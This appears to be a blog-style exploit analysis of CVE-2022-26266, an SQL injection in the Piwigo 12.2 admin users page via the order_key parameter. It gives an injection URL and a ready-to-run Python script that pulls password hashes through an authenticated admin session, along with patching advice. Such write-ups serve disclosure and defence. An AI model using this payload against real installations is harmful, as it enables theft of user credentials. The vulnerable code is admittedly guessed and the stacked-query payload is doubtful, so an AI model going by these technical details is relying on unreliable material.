CVE-2022-26266 - SQL Injection in Piwigo v12.2. via pwg.users.php – Exploit Details and Analysis

Piwigo is a popular open-source photo gallery software used by thousands to manage and share their photos on the web. In early 2022, a serious vulnerability was discovered in Piwigo version 12.2., tracked as CVE-2022-26266. This bug allowed attackers to perform SQL injection via the pwg.users.php endpoint. In this post, we'll break down how the vulnerability works, show sample exploit code, and provide references to the original advisories.

What is SQL Injection?

SQL injection (SQLi) is when an attacker tricks a website into running malicious SQL commands by supplying bad input. This can let them steal sensitive data, modify the database, or even gain total control over the application.

The vulnerable file is

admin/include/pwg.users.php

In version 12.2., this script did not properly sanitize input data before using it in SQL queries. As a result, a user with access to the admin panel could manipulate variables to inject malicious SQL.

Vulnerable Parameter

The main entry point for this vulnerability is the order_key parameter passed to user sorting features in the Admin Users panel.

The relevant code (simplified) might look like this

$query = 'SELECT * FROM '.USERS_TABLE;
$query.= ' ORDER BY '.$_GET['order_key'].' '.$_GET['order_direction'].';';
$result = pwg_query($query);

Here, order_key and order_direction are taken straight from user input (likely from the URL or a form submission), with no validation or escaping.

A malicious user can supply a value for order_key that injects arbitrary SQL, like so

/admin.php?page=users&order_key=id;SELECT+password+FROM+pwg_users+--+&order_direction=ASC

This causes the SQL query to become

SELECT * FROM pwg_users ORDER BY id;SELECT password FROM pwg_users -- ASC;

Depending on how the backend processes multiple queries, this could disclose sensitive data (like password hashes).

Here's a simple script to automate the attack using an authenticated session cookie

import requests

# Set these to your Piwigo instance
target_url = "http://victim.com/admin.php";
session_cookie = "your_authenticated_session_cookie_here"

# Malicious payload
payload = "id;SELECT password FROM pwg_users--"

params = {
    "page": "users",
    "order_key": payload,
    "order_direction": "ASC"
}

cookies = {
    "pwg_id": session_cookie
}

response = requests.get(target_url, params=params, cookies=cookies)
print(response.text)

Warning: You must have admin access and permission to test the target. Never attack systems you don’t own!

How Dangerous is It?

- Impact: Attackers could read arbitrary data, change user accounts, or disrupt the gallery — depending on privileges and DB permissions.
- Requirement: Exploit is only possible if the attacker is logged in as admin (but privilege escalation or insider threats are still critical bugs).

Upgrade: Update to a patched version (12.2.1 or newer).

- Sanitize All Input: Properly escape or whitelist allowed values for order_key and order_direction.

References

- NVD: CVE-2022-26266 Details
- Piwigo Security Advisories
- Exploit Database: 50927
- Piwigo 12.2.1 Release Notes (Security fixes)

Conclusion

CVE-2022-26266 in Piwigo v12.2. is a classic example of why all user input must be validated and sanitized, especially in admin panels. SQL injection remains a common and dangerous bug — easy to fix, but still often missed. The best defense is to keep your software updated and follow secure coding guidelines.

Timeline

Published on: 03/18/2022 23:15:00 UTC
Last modified on: 03/28/2022 18:25:00 UTC